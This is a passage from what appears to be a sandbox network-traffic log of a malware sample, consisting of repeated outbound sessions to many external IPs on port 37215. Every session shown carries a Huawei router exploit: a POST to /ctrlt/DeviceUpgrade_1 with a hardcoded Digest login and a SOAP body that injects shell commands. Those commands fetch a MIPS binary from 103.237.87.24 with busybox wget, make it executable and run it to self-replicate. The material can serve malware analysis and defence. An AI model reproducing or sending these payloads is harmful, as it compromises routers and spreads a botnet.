20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2246192.168.2.133280641.216.234.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.601284027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2247192.168.2.1333420197.153.235.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.601296902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2248192.168.2.1340828140.136.77.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.601385117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2249192.168.2.135960641.71.196.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.601385117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2250192.168.2.135409697.224.253.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.601444006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2251192.168.2.1334734197.88.17.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.601445913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2252192.168.2.1343994197.186.68.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.601463079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2253192.168.2.1343932197.5.8.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.601526022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2254192.168.2.135631491.146.197.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.602530003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2255192.168.2.1346370197.239.183.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.602567911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2256192.168.2.1338274197.118.168.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.602638960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
